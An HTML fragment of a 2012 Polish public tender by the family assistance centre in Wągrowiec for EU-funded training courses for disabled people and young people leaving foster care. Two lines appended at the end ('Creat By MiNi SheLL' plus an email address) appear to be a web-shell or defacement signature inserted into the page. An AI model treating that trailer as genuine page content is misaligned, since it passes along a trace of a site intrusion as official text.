<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy - zgodnie z treścią załącznika nr do SIWZ 2. Oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 u.p.z.p - zgodnie z treścią załącznika nr 2 do SIWZ 3. Program szkolenia z wyszczególnieniem: a) nazwa i adres miejsca szkolenia, b) wymagania wstępne dla uczestników szkolenia, c) czas trwania i sposób organizacji szkolenia, d) cele szkolenia, e) plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem w miarę potrzeby części teoretycznej i części praktycznej, f) treści szkolenia w zakresie poszczególnych zajęć edukacyjnych, g) wykaz literatury oraz niezbędnych materiałów dydaktycznych, h) sposób sprowadzania efektów szkolenia 4. Harmonogram zajęć szkoleniowych - na formularzu zgodnym z treścią załącznika nr 7 do SIWZ 5. Dokumenty stwierdzające, że wskazane osoby, które będą wykonywać niniejsze zamówienie posiadają odpowiednie wykształcenie, kwalifikacje i doświadczenie zawodowe związane z tematyką szkolenia, kursu, 6. Oświadczenie o warunkach lokalowych i wyposażeniu w niezbędny sprzęt instytucji szkoleniowej - w miejscu prowadzenia szkolenia 7. Opis materiałów szkoleniowych, które otrzymają uczestnicy szkolenia, kursu, 8. Parafowany wzór umowy - na formularzu zgodnie z załącznikiem nr 8 do SIWZ 9. Certyfikat jakości usług obejmujący swoim zakresem przedmiot zamówienia ( w przypadku jego posiadania) 10. Wzór zaświadczenia (dokumentu) o ukończeniu szkolenia, kursu, 11. Stosowne pełnomocnictwo w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego odpisu z właściwego rejestru</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy zgodnie z art. 144 ust. 1 ustawy Pzp może nastąpić za zgodą obu stron w formie pisemnego aneksu w przypadku: 1. Zmiana postanowień umowy zgodnie z art. 144 ust. 1 ustawy Pzp może nastąpić za zgodą obu stron w formie pisemnego aneksu w przypadku:21 1) zmiany osób, które uczestniczyć będą w wykonaniu zamówienia pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy oraz pod warunkiem, że osoba wskazana przez Wykonawcę do realizacji zamówienia będzie posiadała kwalifikacje i doświadczenie odpowiadające co najmniej kwalifikacjom i doświadczeniu osoby wymienionej w ofercie, 2) zmiany miejsca wykonania zamówienia pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy oraz pod warunkiem, że nie zmieni się miejscowość wykonania zamówienia, a warunki lokalowe zaproponowane przez Wykonawcę będą porównywalne z warunkami wskazanymi w ofercie, 3) zwiększenia lub zmniejszenia ustalonej w umowie liczby osób skierowanych na szkolenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wagrowiec.pl   i www.pcpr.wagrowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie, ul. Wierzbowa 1, 62-100 Wągrowiec, pokój nr 6 ( II piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2012 godzina 14:00, miejsce: Powiatowe Centrum Pomocy Rodzinie, ul. Wierzbowa 1, 62-100 Wągrowiec, pokój nr 6 ( II piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja projektu systemowego pn. Rozwój i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych i pomoc osobom usamodzielnianym współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs grafiki komputerowej - program Corell Draw, projektowanie stron www.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest  nabycie wiedzy teoretycznej i praktycznych umiejętności na temat tworzenia i edycji prac graficznych, przygotowanie do dalszego kształcenia w kierunku grafika komputerowego. Nabycie wiedzy teoretycznej   i praktycznych umiejętności z zakresu konstruowania stron internetowych, rozbudowywania witryn internetowych.   
Program kursu  oraz  materiały dydaktyczne powinny być opracowane zgodnie                         
z obowiązującymi w tym zakresie przepisami prawa oraz powinien uwzględniać  zagadnienia:
związane  z  grafiką komputerową CorellDraw  ( 25 h)  oraz  projektowaniem   stron www               - ( 25h). 
Do uczestnictwa w kursie  zostało zakwalifikowanych  21 osób , w tym 12 osób niepełnosprawnych oraz 9-ioro usamodzielnianych wychowanków  rodzinnych                            i instytucjonalnych form pieczy zastępczej oraz placówek o których mowa w  ustawie o pomocy społecznej.
Przeprowadzenie kursu  w ramach   dwóch grup  liczących 12 i 9  osób.    
Wskazanym jest, aby szkolenie dla każdej grupy odbywało się w innym terminie.  
Termin realizacji zamówienia: 15 października - 30 listopada 2012r.
Liczba godzin kursu powinna obejmować minimum 50 godzin zegarowych dla każdego  uczestnika kursu.
Zajęcia powinny odbywać się: 
I grupa osoby niepełnosprawne: od poniedziałku do piątku w godz. od 16.00 do 20.00  
II grupa usamodzielniani wychowankowie:  od poniedziałku do środy w godz. od 1530 do 1930 oraz od soboty do niedzieli w godz. od 1000 do 1600
Dzienna liczba godzin kursu nie może przekroczyć 8 godzin zegarowych.
Miejsce kursu:  siedziba Zamawiającego - ul. Wierzbowa  1 , miasto Wągrowiec                             ( sala szkoleniowa wraz z zapleczem zostanie udostępniona  nieodpłatnie) .  
Zamawiający  dopuszcza ewentualność  zmiany miejsca prowadzenia kursu, z zastrzeżeniem  zachowania identycznych warunków  dotyczących użyczenia  Sali szkoleniowej wraz  z zapleczem)
Kurs powinien być zakończony egzaminem wewnętrznym, wydaniem  zaświadczenia 
o ukończeniu kursu i uzyskanych kwalifikacjach.
W ramach kwalifikowanych kosztów  Wykonawca jest zobowiązany  do: 
- zwrotu kosztów dojazdów 6 osobom spoza miasta Wągrowca, w ustalonej kwocie ryczałtowej 20 zł za 1 osobodzień obecności uczestnika na kursie;
- zapewnienia  napojów  (m.in. kawa, herbata, woda mineralna), wyrobów cukierniczych  jako poczęstunek oraz niezbędnych dla konsumpcji  jednorazowych naczyń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs florystyczno-bukieciarski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest nabycie wiedzy teoretycznej i umiejętności praktycznych niezbędnych                              do podjęcia pracy w kwiaciarni, przygotowanie do dalszego kształcenia w dziedzinie  bukieciarstwa oraz  florystyki.
Program kursu  oraz materiały dydaktyczne  powinny być opracowane zgodnie                         
z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać zagadnienia związane  florystycznymi  zasadami  kompozycyjnymi-   florystyką okolicznościową,  sztuką układania kwiatów w naczyniach,  dekoracją kwiatów doniczkowych, artystycznym  pakowaniem prezentów. 
Do uczestnictwa w kursie zostały zakwalifikowane  22 osoby, w tym 9 osób niepełnosprawnych oraz 13 usamodzielnianych wychowanków  rodzinnych                              i instytucjonalnych form pieczy zastępczej oraz placówek, o których w ustawie o pomocy społecznej. 
Przeprowadzenie kursu  w ramach   dwóch grup  liczących 9 i 13  osób.    
Termin realizacji zamówienia: 15 października - 30 listopada 2012r.
Liczba godzin kursu powinna obejmować minimum 40 godzin zegarowych dla każdego  uczestnika kursu.
Zajęcia powinny odbywać się od poniedziałku do piątku w godz. od 1530 do 1930                                       z możliwością prowadzenia zajęć w systemie weekendowym od 1000 do 1600
Dzienna liczba godzin kursu nie może przekroczyć 8 godzin zegarowych.
Miejsce kursu:  siedziba Zamawiającego - ul. Wierzbowa  1 , miasto Wągrowiec                             ( sala szkoleniowa wraz z zapleczem zostanie udostępniona  nieodpłatnie) .  
Kurs powinien być zakończony egzaminem wewnętrznym, wydaniem  zaświadczenia 
o ukończeniu szkolenia i uzyskanych kwalifikacjach.
W ramach kwalifikowanych kosztów  Wykonawca jest zobowiązany  do: 
-zwrotu kosztów dojazdów  15 osobom spoza miasta Wągrowca, w ustalonej kwocie ryczałtowej 20 zł za 1 osobodzień obecności uczestnika na kursie;
-zapewnienia  napojów (m.in. kawa, herbata, woda mineralna), wyrobów cukierniczych  jako poczęstunek oraz niezbędnych dla konsumpcji  jednorazowych naczyń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs obsługi piły motorowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu  jest  nabycie i opanowanie przez uczestników wiedzy i podstawowych umiejętności z zakresu obsługi i eksploatacji piły motorowej  oraz podstawowych technik pracy. Program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie                         
z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać zagadnienia związane  z technikami pracy. 
Do uczestnictwa w kursie  zostało zakwalifikowanych  8 osób ( w tym 7 osób niepełnosprawnych) .
Termin realizacji zamówienia: 15 października 2012r. - 30 listopada 2012r.
Liczba godzin zajęć dydaktycznych oraz  praktycznych ramach   kursu powinna  wynosić min.16 godzin zegarowych na każdego  uczestnika kursu.
Zajęcia powinny odbywać się systemie weekendowym  od 1000 do 1500, z tym,                                 że jednorazowa  ilość zajęć  w ramach kursu  nie może przekroczyć 6 godzin zegarowych.
Miejsce kursu: miasto Wągrowiec lub inna miejscowość wskazana przez Wykonawcę,                            z zastrzeżeniem  organizacji dowozu i odwozu uczestników kursu z  i do miasta Wągrowca.
Kurs powinien  być zakończony egzaminem wewnętrznym, wydaniem zaświadczenia 
o ukończeniu i uzyskanych kwalifikacjach.
Wykonawca zapewni uczestnikom kursu odzież i obuwie robocze.
Koszty niezbędnych badań  lekarskich osób zakwalifikowanych do uczestnictwa w kursie obsługi piły motorowej pokrywane są przez  Zamawiającego w ramach odrębnego zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs palacza CO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest uzyskanie uprawnień   palacza pieców CO - w zakresie obsługi kotłów wodnych i parowych na paliwa stałe, ciekłe i gazowe. 
Program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie                         
z obowiązującymi w tym zakresie przepisami prawa  oraz uwzględniać zagadnienia związane dozorem technicznym, obowiązkami  palacza pieców CO, eksploatacją kotłów, przemysłowymi  urządzenia pary i gorącej wody, zasadami BHP przy urządzeniach cieplnych i na stanowisku palacza CO oraz ochroną  p.poż,  
 Do uczestnictwa  w kursie  zostało zakwalifikowanych  6 osób niepełnosprawnych.
Termin realizacji zamówienia: 15 października 2012r. - 14 grudnia 2012r.
Liczba godzin zajęć dydaktycznych oraz  praktycznych ramach   kursu powinna  wynosić min. 20  godzin zegarowych na każdego  uczestnika kursu.
Zajęcia powinny odbywać się systemie weekendowym od 1000 do 1500, z tym,                                 że jednorazowa  ilość zajęć  w ramach kursu  nie może przekroczyć 6 godzin zegarowych.
Miejsce kursu: miasto Wągrowiec lub inna miejscowość wskazana przez Wykonawcę,                            z zastrzeżeniem  organizacji dowozu i odwozu uczestników kursu z  i do miasta Wągrowca.
Kurs powinien  być zakończony egzaminem wewnętrznym, wydaniem zaświadczenia 
o ukończeniu i uzyskanych kwalifikacjach.
Wykonawca zapewni uczestnikom kursu odzież i obuwie robocze.
Koszty niezbędnych badań  lekarskich osób zakwalifikowanych do uczestnictwa w kursie palacza co pokrywane są przez  Zamawiającego w ramach odrębnego zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs krawiectwa lekkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest zapoznanie z podstawowymi wiadomościami i techniką krawiecką, nabycie podstawowej wiedzy z zakresu krawiectwa lekkiego, praktycznych umiejętności z zakresu kroju i szycia. Program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie  z  obowiązującymi w tym zakresie przepisami prawa  oraz uwzględniać zagadnienia 
technologii krawiectwa, materiałoznawstwa, kroju  i modelowania.  
Do uczestnictwa w kursie zostały zakwalifikowane  3 osoby niepełnosprawne.
Termin realizacji zamówienia: 15 października 2012 r. - 14 grudnia 2012r.
Liczba godzin zajęć dydaktycznych oraz  praktycznych ramach   kursu powinna  wynosić min. 40  godzin zegarowych na każdego  uczestnika kursu.
Zajęcia powinny odbywać się od poniedziałku do piątku w godz. od 1600 do 1900 ,                                      z możliwością prowadzenia zajęć w systemie weekendowym od 1000 do 1500
 z tym, że jednorazowa  ilość zajęć  w ramach kursu  nie może przekroczyć 8 godzin zegarowych.
Miejsce kursu: miasto Wągrowiec lub inna miejscowość wskazana przez Wykonawcę,                            z zastrzeżeniem  organizacji dowozu i  odwozu uczestników kursu z  i do miasta Wągrowca.
Kurs powinien  być zakończony egzaminem wewnętrznym, wydaniem zaświadczenia 
o ukończeniu i uzyskanych kwalifikacjach.
Wykonawca zapewni uczestnikom kursu odzież roboczą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs komputerowy - podstawy MS Office  - zakup vouchera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest nabycie umiejętności, które pozwalają na samodzielne posługiwanie się programami pakietu MS Office,  program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie   z obowiązującymi w tym zakresie przepisami prawa  oraz uwzględniać 
zagadnienia: MS WORD XP, MS EXCEL XP, MS ACCESS XP, MS POWER POINT XP, MS OUTLOOK XP
Voucher zostanie zakupiony dla jednej osoby niepełnosprawnej. 
Termin realizacji zamówienia: 15 października 2012r. - 30 listopada 2012r.
Liczba godzin kursu powinna obejmować minimum 40 godzin  zegarowych  i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych.  
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych.
Miejsce realizacji kursu: miasto Wągrowiec,  pomieszczenia dostępne  dla osoby z dysfunkcją narządu ruchu. 
Kurs powinien być zakończony egzaminem wewnętrznym oraz  wydaniem  zaświadczenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs podstawowy języka francuskiego - zakup vouchera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest nabycie umiejętności praktycznego posługiwania się językiem francuskim,  
Program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie                         
z obowiązującymi w tym zakresie przepisami prawa  oraz uwzględniać zagadnienia:
sytuacji i rozmów codziennych, rozkład dnia, nazwy liter, kolory, dni, miesiące, pory roku
pytania, prośby, przeprosiny, odmowy, ja i moi bliscy, rodzina, przyjaciele, przedstawianie się , dom, mieszkanie, opis przedmiotów w domu, w pracy, praca, umawianie spotkań
miasto, wieś, komunikacja publiczna - środki transportu, zachowanie na ulicy - pytanie o 
drogę, zakupy, bar, kawiarnia, kino, teatr, muzyka
Voucher zostanie zakupiony dla jednej osoby niepełnosprawnej. 
Termin realizacji zamówienia: 15 października 2012r. - 30 listopada 2012r.
Liczba godzin kursu powinna obejmować minimum 80 godzin  zegarowych  i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych.  
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych.
Miejsce realizacji kursu: miasto Wągrowiec,  pomieszczenia dostępne  dla osoby z dysfunkcją narządu ruchu. 
Kurs powinien być zakończony egzaminem wewnętrznym oraz  wydaniem  zaświadczenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com